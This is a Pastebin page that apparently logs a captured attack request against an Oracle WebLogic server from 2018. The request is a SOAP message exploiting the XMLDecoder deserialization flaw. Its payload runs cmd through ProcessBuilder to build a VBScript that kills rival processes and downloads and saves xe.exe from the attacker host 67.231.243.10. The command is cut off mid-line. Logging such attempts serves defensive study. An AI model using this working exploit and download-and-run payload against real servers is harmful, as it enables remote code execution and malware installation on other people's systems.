thlnk3r

wls_vuln_attempt_67.231.243.10

Jan 13th, 2018
593
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Host:
  2. Content-Length: 1745
  3. Accept-Encoding: gzip, deflate, compress
  4. X-Forwarded-For: 10.244.31.175
  5. Accept: */*
  6. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
  7. Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  8. Content-Type: text/xml
  9.  
  10. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  11. <soapenv:Header>
  12. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  13. <java version="1.8.0_131" class="java.beans.XMLDecoder">
  14. <void class="java.lang.ProcessBuilder">
  15. <array class="java.lang.String" length="3">
  16. <void index="0">
  17. <string>cmd</string>
  18. </void>
  19. <void index="1">
  20. <string>/c</string>
  21. </void>
  22. <void index="2">
  23. <string>echo Set xPost = CreateObject("Microsoft.XMLHTTP") > hu.vbs&@echo taskkill /IM iee.exe /f&@echo taskkill /IM 3.exe /f&@echo taskkill /IM 1e.exe /f&@echo taskkill /IM je.exe /f&@echo taskkill /IM iie.exe /f&@echo xPost.Open "GET","http://67.231.243.10:8220/xe.exe",0 >> hu.vbs&@echo xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject("ADODB.Stream") >> hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo sGet.SaveToFile "xe.exe",2 >>hu.vbs&@cs
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×